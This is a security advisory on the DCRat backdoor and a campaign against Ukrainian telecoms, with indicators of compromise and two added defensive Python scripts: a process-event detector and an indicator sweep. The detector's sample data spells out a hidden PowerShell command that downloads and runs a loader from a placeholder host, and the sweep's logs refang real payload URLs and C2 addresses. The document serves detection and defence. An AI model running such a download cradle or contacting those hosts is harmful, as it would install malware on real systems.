Severity
High
Analysis Summary
DCRat, a Russian backdoor, was first introduced in 2018, then rebuilt and relaunched a year later. The DCRat backdoor appears to be the work of a single threat actor who operates online under the pseudonyms “boldenis44,” “crystalcoder,” and Кодер (“Coder”).
DCRat is one of the cheapest commercial RATs. A two-month subscription starts at 500 RUB (less than 5 GBP / US$6), and the price periodically drops even lower during special offers. The malware is written in .NET and has a modular structure, allowing affiliates to create their own plugins using DCRat Studio, a dedicated integrated development environment (IDE).
The malware’s modular architecture allows it to be extended for a variety of nefarious objectives, including surveillance, reconnaissance, data theft, DDoS attacks, and arbitrary code execution.
The DCRat consists of three parts:
- A stealer/client executable
- A command-and-control (C2) endpoint/interface, which is a single PHP page
- An administrator tool
The malware is still under active development; the author announces news and updates through a dedicated Telegram channel with about 3k subscribers.
Recently, DarkCrystal RAT has been used in attacks against Ukrainian telecom operators, according to the Ukrainian Response Team. The malspam messages carry the password-protected attachment “Algorithm of actions of members of the family of a missing serviceman LegalAid.rar” and use the subject line “Free main legal aid.”
According to them:
When the “Algorithm LegalAid.xlsm” file is opened and the macro is enabled, a PowerShell command will be executed. The script will download and launch the DarkCrystal RAT malware, and will also download and run the .NET bootloader “MSCommondll.exe.”
Based on this information, it is assumed that the attack is directed against operators and wireless providers in Ukraine.
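The chain described above (macro-enabled spreadsheet, PowerShell, downloaded .NET loader) is a parent/child process relationship that endpoint telemetry can flag regardless of which domain or hash a given campaign uses. The following is an added example, not code from the Rewterz advisory or from CERT-UA: a small Python scorer over Sysmon-style process-creation events. The event records, the field names and the download host loader.example.invalid are constructed; only the loader file name MSCommondll.exe is taken from the advisory.

```python
"""Hypothetical detection for the delivery chain described above: a macro in a
spreadsheet launches PowerShell, which downloads and runs a loader. Added
example, not part of the Rewterz or CERT-UA material; the process-creation
events below are constructed and shaped like Sysmon/EDR telemetry."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Office applications whose direct child should rarely be a script host.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
# Command-line fragments typical of a PowerShell download cradle.
DOWNLOAD_CRADLE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b"
    r"|net\.webclient|start-bitstransfer", re.I)
REMOTE_URL = re.compile(r"https?://", re.I)
# Flags that hide the console or skip policy; noisy alone, telling in combination.
EVASION_FLAGS = re.compile(
    r"-(enc|encodedcommand|e)\b|-nop\b|-noprofile\b|-w(indowstyle)?\s+hidden"
    r"|-exec(utionpolicy)?\s+bypass", re.I)


@dataclass
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> Dict:
    """Attach detection reasons and a severity to one process-creation event."""
    image, parent = _basename(ev.image), _basename(ev.parent_image)
    reasons: List[str] = []
    if image in SCRIPT_HOSTS:
        if parent in OFFICE_PARENTS:
            reasons.append("office-spawned-script-host")
        if DOWNLOAD_CRADLE.search(ev.command_line) or REMOTE_URL.search(ev.command_line):
            reasons.append("download-cradle")
        if EVASION_FLAGS.search(ev.command_line):
            reasons.append("evasion-flags")
    # Office -> PowerShell -> download is the chain the advisory describes, so that
    # combination alone is rated high; other combinations are weaker signals.
    if "office-spawned-script-host" in reasons and "download-cradle" in reasons:
        severity = "high"
    elif len(reasons) >= 2:
        severity = "medium"
    elif reasons:
        severity = "low"
    else:
        severity = "none"
    return {"host": ev.host, "severity": severity, "reasons": reasons}


def detect(events: List[ProcessEvent]) -> List[Dict]:
    """Return the scored events that triggered at least one reason."""
    return [r for r in (score_event(e) for e in events) if r["reasons"]]


# Constructed sample telemetry. The first event mirrors the advisory's chain,
# using the loader file name from the advisory and a placeholder download host.
SAMPLE_EVENTS = [
    ProcessEvent("WS-01", r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'''powershell.exe -nop -w hidden -c "(New-Object Net.WebClient).DownloadFile('http://loader.example.invalid/MSCommondll.exe','C:\Users\Public\MSCommondll.exe'); Start-Process C:\Users\Public\MSCommondll.exe"'''),
    ProcessEvent("WS-02", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"),
    ProcessEvent("WS-03", r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 r"C:\Windows\System32\cmd.exe", "cmd.exe /c echo hello"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Run stand-alone it prints one high-severity alert for the Office-spawned download cradle and one low-severity alert for the signed-off admin script with an execution-policy bypass; the cmd.exe child of Excel is not a script host and is not reported. The split between a single weak signal and the full chain is deliberate: policy-bypass flags on their own are common in legitimate automation, while an Office parent plus a download cradle is the exact sequence the advisory describes.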
Impact
Data Theft
Exposure of Sensitive Data
Indicators of Compromise
Domain Name
- datagroup[.]ddns[.]no
IP Address
- 203[.]96[.]191[.]70
- 31[.]7[.]58[.]82
MD5
- b726312450e28faa38396736be1b00fb
- fd2e0ec9021783dba1c9744fa730e5b9
- 19bbb1b94f66609cbd80945c14486e93
SHA-256
- 2b2438aa8da7c23e714f2d7a196d82ed52914c9353ef9fded01448216bd858ff
- 471af7ed687ef875c6118ec2f440f0dea9a434b54d81b7946f58505676f7c589
- 7cffb54cb07db2f4104b8764ff15799111d06ea81d9c74c09134c61341d74202
SHA-1
- 805a8f5e68c84b45d14250ecd199e15c2c14fc9a
- 1ccb921ca679b14771a5959d4835abcc62ea18ac
- 5a37c52dc94da852dd3c0e674d78b2bb6ec38f41
URL
- http[:]//plexbd[.]net/MSCommonDriver[.]exe
- http[:]//plexbd[.]net/MSCommondll[.]exe
- https[:]//datagroup[.]ddns[.]net/PythonHttpGeolongpolldefault[.]php
Remediation
- Block the threat indicators at their respective controls.
- Search for IOCs in your environment.
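To act on the two remediation steps, the defanged indicators above have to be refanged, and URL indicators should contribute their host names to the blocklist (the page lists datagroup[.]ddns[.]no as a domain, while datagroup[.]ddns[.]net appears only inside a URL). The following added example, not part of the advisory, parses the indicator list as printed above (with the IP list given its own IP Address header), refangs it, and sweeps constructed DNS, proxy, EDR and firewall log lines for hits. The log lines, host names and field layout are constructed; the indicator values are the page's.

```python
"""Refang the advisory's defanged indicators and sweep log lines for them.
Added example, not part of the Rewterz advisory. Indicator values are the
ones listed in the advisory; the log lines are constructed."""
import re
from typing import Dict, List, Set, Tuple
from urllib.parse import urlparse

ADVISORY_IOCS = """
Domain Name
- datagroup[.]ddns[.]no
IP Address
- 203[.]96[.]191[.]70
- 31[.]7[.]58[.]82
MD5
- b726312450e28faa38396736be1b00fb
- fd2e0ec9021783dba1c9744fa730e5b9
- 19bbb1b94f66609cbd80945c14486e93
SHA-256
- 2b2438aa8da7c23e714f2d7a196d82ed52914c9353ef9fded01448216bd858ff
- 471af7ed687ef875c6118ec2f440f0dea9a434b54d81b7946f58505676f7c589
- 7cffb54cb07db2f4104b8764ff15799111d06ea81d9c74c09134c61341d74202
SHA-1
- 805a8f5e68c84b45d14250ecd199e15c2c14fc9a
- 1ccb921ca679b14771a5959d4835abcc62ea18ac
- 5a37c52dc94da852dd3c0e674d78b2bb6ec38f41
URL
- http[:]//plexbd[.]net/MSCommonDriver[.]exe
- http[:]//plexbd[.]net/MSCommondll[.]exe
- https[:]//datagroup[.]ddns[.]net/PythonHttpGeolongpolldefault[.]php
"""

# Section headers as they appear in the advisory, mapped to a match type.
CATEGORY = {"domain name": "domain", "ip address": "ip", "md5": "hash",
            "sha-1": "hash", "sha-256": "hash", "url": "url"}
IP_RE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")
HASH_RE = re.compile(r"\b(?:[0-9a-f]{64}|[0-9a-f]{40}|[0-9a-f]{32})\b", re.I)


def refang(value: str) -> str:
    """Undo the [.] / [:] defanging used in the advisory (and the hxxp convention)."""
    value = value.replace("[.]", ".").replace("[:]", ":").replace("[/]", "/")
    return re.sub(r"^hxxp", "http", value.strip(), flags=re.I)


def parse_iocs(text: str) -> Dict[str, Set[str]]:
    """Turn the advisory's indicator list into per-type sets of refanged values."""
    iocs: Dict[str, Set[str]] = {"domain": set(), "ip": set(), "hash": set(), "url": set()}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("- ") and current:
            value = refang(line[2:])
            iocs[current].add(value.lower() if current in ("domain", "hash") else value)
        else:
            current = CATEGORY.get(line.lower())
    # A URL indicator implies its host: the advisory lists datagroup.ddns.no as a
    # domain but datagroup.ddns.net only inside a URL, so derive hosts explicitly.
    for url in iocs["url"]:
        host = urlparse(url).hostname
        if host:
            iocs["domain"].add(host.lower())
    return iocs


def scan(lines: List[str], iocs: Dict[str, Set[str]]) -> List[Tuple[int, str, str]]:
    """Return (line_number, type, indicator) for every indicator seen in the lines."""
    hits = []
    for n, line in enumerate(lines, 1):
        low = line.lower()
        for ip in IP_RE.findall(line):          # whole dotted quads only
            if ip in iocs["ip"]:
                hits.append((n, "ip", ip))
        for h in HASH_RE.findall(line):
            if h.lower() in iocs["hash"]:
                hits.append((n, "hash", h.lower()))
        for url in sorted(iocs["url"]):
            if url.lower() in low:
                hits.append((n, "url", url))
        for host in sorted(iocs["domain"]):
            # Match the domain or a subdomain of it, not a longer name that contains it.
            if re.search(r"(?<![\w-])" + re.escape(host) + r"(?![\w.-])", low):
                hits.append((n, "domain", host))
    return hits


# Constructed log lines from DNS, proxy, EDR and firewall sources.
SAMPLE_LOGS = [
    "2022-06-28T09:12:01Z dns client=10.0.5.23 query=datagroup.ddns.net type=A",
    "2022-06-28T09:12:03Z proxy client=10.0.5.23 method=GET url=http://plexbd.net/MSCommondll.exe status=200",
    "2022-06-28T09:12:09Z edr host=WS-01 file=C:/Users/Public/MSCommondll.exe "
    "sha256=471af7ed687ef875c6118ec2f440f0dea9a434b54d81b7946f58505676f7c589",
    "2022-06-28T09:13:00Z fw src=10.0.5.23 dst=31.7.58.82 dport=80 action=allow",
    "2022-06-28T09:14:00Z dns client=10.0.5.40 query=updates.example.invalid type=A",
    "2022-06-28T09:15:00Z fw src=10.0.5.41 dst=31.7.58.8 dport=443 action=allow",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS, parse_iocs(ADVISORY_IOCS)):
        print(hit)
```

The last firewall line is there on purpose: 31.7.58.8 is a prefix of the listed 31.7.58.82, and a naive substring search would report it. Anchoring IP and domain matches on token boundaries keeps the sweep precise, while matching subdomains of a listed domain keeps it from missing hosts the actor rotates under the same name.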